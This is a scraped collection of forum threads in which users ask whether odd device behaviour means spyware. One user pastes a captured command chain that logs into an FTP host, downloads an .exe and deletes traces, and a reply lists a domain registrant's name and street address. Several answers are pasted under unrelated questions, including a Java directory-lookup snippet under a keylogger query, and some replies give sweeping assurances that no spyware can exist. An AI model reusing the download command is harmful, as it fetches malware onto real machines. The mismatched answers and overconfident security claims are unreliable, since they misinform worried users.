Possible spyware

Hello,
I have read many articles claiming that Viber app for iphone is a malware/spyware and a possible backdoor trojan. I am very concerned with this issue, I have deleted the app as a precaution. I need to know whether this information is true and if so, why did apple allow it to be installed from the app store. Also, by deleting the app will the spyware be deleted as well? Moreover, are there any recommeded iphone anti-malware programs that an be purchased?
Thanks.

This isn't very likly because of the way iOS sandboxes applications and controls access to private information (Settings > Privacy). As a result, there isn't any anti-malware programs for iOS.
Also, the app would also be removed from the App Store if there was a problem.

  • Serious, possible spyware problem, help please

I have a serious situation happening and I have no idea where to go with it so hoping you guys can help.
I have a Nokia 2760 so a very basic phone but some strange things have been happening lately.
Firstly a few weeks back whenever I would call someone on the display screen it would not only list the person I was talking to but have my mothers contact there as well, I asked her if she was getting calls and hearing everything and she said no, so I just deleted her from the contact list and put her back in and it stopped.
Then 2 weeks ago while out with my husband she received a call from me and she heard 10 seconds of our what we were talking about at dinner. It was recorded on her voicemail so I heard it and looked at her log and it showed a call from me but my log showed nothing.
Then last night was the most disturbing, she once again got a call and it recorded what my husband and I were doing onto her voicemail again but once again no log on my phone showing I made a call and I know for a fact my phone was sitting closed on my bedside table.
What could be doing this? I looked it up and saw there is a program called flexispy that turns your phones microphone on by a remote user but being such a basic phone I find it hard to believe someone has control over my phone. Is this at all possible? and if so how do I find out if it's on my phone and how do I get this to stop, I am totally weirded out and it's disturbing to say the very least!!
    Thanks

There is no spyware for S40 phones like the 2760. It's just a minor software corruption that can happen with any phone.
Start by performing a revert to factory default settings. Enter *#7780# from standby and provide your security code when prompted. Unless you changed it, 't should be the default on all Nokia phones, 12345.
If this doesn't work, you'll need to take the phone to your nearest Nokia Care Point for them to reflash it. In this case, back up all your data on the phone first because this operation will wipe its memory clean.

  • Possible Spyware Problem

    Hi all,
Every once in a while, when I try to go to a website, I get a GoDaddy search page saying this site is "coming soon." I get this for sites such as Google, Gmail, and other sites that I know exist. It happens in all browsers--FF, Safari, Opera, Mozilla, etc. Someone told me that it could be spyware... does anyone know anything about this, or how to fix it? Thanks.
    --Ryan

Try deleting your Cache files. You can use a 3rd party application such as Cocktail or TCC. Just do a search on http://www.macupdate.com

  • How to determine if mbp has key logger or spyware

Strange logs and possible spyware. Brand new mbp, migrated from older mbp and now wondering if i should wipe it clean and start over. Not sure what all migrated over to my new mbp.
Most of my google questions took me to Linc Davis discussions.
I am new to this help site and appreciate the expert advise.
Thank you for helping!  Please let me know what logs you need to assess the situation.

    Just retrieve it like any other attribute !!!!String returnedAtts[]={"sn","givenName","distinguishedName","msDS-UserPasswordExpired"};
    searchCtls.setReturningAttributes(returnedAtts);
    Attributes attrs = sr.getAttributes();
    if (attrs != null) {
    try {
    System.out.println("Password Expired: " + attrs.get("msDS-UserPasswordExpired").get());
.....A constructed attribute simply means that it's value is automagically constucted by the domain controller when it is explicitly requested. It is not an attribute where the value is stored in the directory.
No need to refresh caches etc.
The reference to refreshing the cache for .NET (and in particular ADSI) is that ADSI automagically constructs a cache for all of the persisted attributes of an object.

  • Did DW CS3 installer put this crap on my system???

A bit after installing DW CS3, my firewall popped an alert
that 'mdnsresponder.exe' tries to establish a connection to
    something.
I was intrigued and did a quick search to find the following:
    1. A new folder C:\Program Files\Bonjour, containing the
above mentioned mdnsresponder.exe and some .dll
I was pretty sure I never installed this, but to be 100% sure
I checked an image I created 3 days ago - there was no such folder.
I found that mdnsresponder.exe "is a process associated with
"Bonjour for Windows" software. It is used by ITunes for music
    sharing."
    2. .. and here comes the big surprise,
a service ???? set to start automatically ??!!!!?? , which
launches this file at every startup. The service has some idiotic
    name like ##Id_String1.6844F930........................##.
    Indeed I disabled it.
As DW CS3 is the only software I installed in the last month,
I'm pretty sure it put this crap on my system - is it true?
    Anyone has something similar?
It is completely unacceptable, least to say, a program we pay
big bucks for to silently install crapware, adware and possibly
spyware on user systems, without any prompt or option to skip the
    installation!
What comes next - a porn dialer ?

  • What is iNode34981778?

Takes up almost 6 GB memory. I have never seen this before. Is it possible spyware?

It's a swap file from a previous session that failed to be deleted. Drag it to the Trash and empty. If it happens again, the startup drive may be malfunctioning.

  • Ever, decreasing...internet......speed.........

My internet (Safari) keeps getting slower and slower. About every 3 months or so it takes a significant drop in speed. It now takes at least 20 seconds on average to load a single web page. However the download speeds have not decreased much at all. I checked the bandwidth and its about 1 mbps which is what its always been since I upgraded to broadband. I originally thought that maybe it was my wireless router going dead. Its a Linksys WT54G or something like that. But every now and then my airport card will fail. It will kick me off the network and when I try to get back on it will keep saying failed to connect and I know this isn't just because of my router because this also happens at ASU (my college). Does anyone else have this problem? Bad hardware? Possibly spyware or viruses (I know they aren't very common on Macs but I'm just throwing anything out)? Bad router? Or a combination of those? Somebody please help, this is almost as bad as dial up!

It uses public DNS servers vs. the likely crummy ones your ISP provides.
If you want better DNS, use the DNS servers from Opendns.com
    208.67.222.222
    208.67.220.220
They filter out known phishing sites and will even correct typos like if you put in craigslist.com it will send it to craigslist.org for you.
Note DNS takes your "apple.com" (or any web site) which means nothing to the internet and finds out the IP address for you and sends the traffic to the right IP address.
Since you are using a router , to save doing these IP addresses in every computer that connects, put these in your router setup screen instead of what is there now which will be nothing. Then every computer benefits.
Here is a link to see how to do it anywhere:
    http://www.opendns.com/start/
Upper right on the page, just pick the operating system or device and they show you with pictures.
ISP's pay bottom dollar I am convinced, for DNS.

  • My iMac don't start up properly

I Don't know what exactly happen to my iMac. But, it will start up then display spinning wheel with loading bar below which first time I seen. I try to resolved this issue by myself by use disk utilies. When I was done with disk utilies, I restart it. Then it do same thing but this time, went black and shut down. I unable to get further than this point.
I suspect that it occur when I accident use webcomic as wallpaper. Reason is that I can't change wallpaper until I restart. Which start loading bar issue.
I did scan for any possible spyware or virus, it come clean.

  • Toolbar alerts

I recently experimented with loading some type of TV viewer on my MBP. I decided to delete it and "think" I did as I really do not know how to delete a program. I now have an icon on the toolbar "alert". Is this a normal MBP icon, which I have not noticed before, or put there by the TV program I tried to install? I would like to get rid of it but am unable to. Any comments and assistance is appreciated.

Delete all the following folders, then reboot:
    /Applications/Toolbars
    /Library/Application Support/Conduit
    /Library/InputManagers/CTLoader
Let me give you some friendly advice. If you download installer packages from random websites offering "free" content, you're eventually going to install spyware (if you haven't already), or worse. NEVER run any installer package, or enter your administrator password when prompted by an application, unless it comes from Apple or another source you KNOW you can trust. What you installed is pure garbage and possibly spyware.

  • Is it possible to get a virus or spyware on a iPad ?

My iPad II seems to have a virus. Notes have disappeared twice. Changes pages for no reason.
It it possible t get a virus o spyware?
    Thank you.

Not really.  If your ipad is jailbroken then maybe.  The ios operating system is partitioned and locked.
For issues with notes, what type of email account do you have setup on the device.  I ask this as some email accounts allow note syncing.  As note syncing with email accounts are done OTA, there could be an issue that causes them to disappear.  You can logging to your email account and most have a note section to verify if they are present.
I am not sure what you mean by changing pages.  Could you elaborate on that more?

  • Is it possible to download spyware on an iPad?

Is it possible to download spyware on an iPad? If so, how do you detect it?

It is possible that a piece of spyware could be hidden or attached to a piece of e mail, or even embedded in a web page.  But if it is, it cannot do anything on the pad.  It cannot monitor you or track you.  It would be locked into the sandbox it arrived in.

  • Possible virus or spyware?

Lately people on my contact list for Hotmail have been getting emails from me that send them a link to some website (not sure if it's the same site every time or not). I have not been sending the email and my friends seem to think I have a virus. I am not aware of any viruses for the mac but thought I would ask if anyone else has had this problem and what can be done.

That's typical hotmail spam. You don't have a virus or any spyware, but some spammer/criminal is using your hotmail address.
    Read this.
    http://www.nytimes.com/2009/06/20/technology/internet/20shortcuts.html?_r=1&sq=m ylife.com&st=cse&adxnnl=1&scp=1&pagewanted=all&adxnnlx=1283097752-leYApf/WISMJF8 2j5xFjTA
I wouldn't use hotmail if you paid me. It's loaded with spammers. All the spam I receive comes through a stolen hotmail address.

  • Possible firewall/spyware hack going on??

    Hi there,
Can anyone help me? From time to time when I use my machine the keyboard seems to start typing things all on its own. If the cursor happens to be in a search field I can see what it is typing; otherwise the computer just beeps as it tries to make sense of keyboard inputs.
I have no idea if this is just a weird hardware thing going on, if I may have some spyware in my Mac (which is quite surprising) or someone is trying to hack my computer through an open port.
I managed to intercept some of the 'transmission' in TextEdit:
    cho open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get winbackup16.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7winbackup16.exe 7exit
So far it hasn't managed to do anything malicious, apart from maybe annoy me by typing randomly while I am trying to rename a file in iTunes and other things like that. Does anyone have any ideas what might be happening, and how to solve it?
    Many thanks...
    :-Joe

Wow. This sounds serious. You need to find this virus, kill it, and find out where it came from and lock down your computer. You can probably find it using Activity Monitor. If not, since it seems to be trying to get a exe file via ftp you can enter
    lsof -i :21
in Terminal. Keep trying. You should catch it. Note the pid. Next
    lsof -p pid
to see what files it has opened. (Enter the pid where I wrote pid)
In Activity Monitor, find the pid, inspect it, and note the parent process.
    Back in Terminal, enter
    kill -9 pid
At some point you might want to ask the registrant of killyourself.info
    Registrant Name:Mike Rinaldi
    Registrant Organization:Narcotics Anonymous
    Registrant Street1:14 N. Main St.

why some virus is trying to ftp to his site and download winbackup16.exe. Of course, he may have no idea what's going on. If so, he'd be interested to know that someone out there (including us now) know a username and password on his ftp server.
Report back with more info ASAP.

  • Is it possible to get spyware on my iphone5s from downloading an image sent from a stranger by email? Please and thank you!!

    Please, thank you!!

As long as your phone is not jailbroken, nothing can be installed that way. You have nothing to worry about.
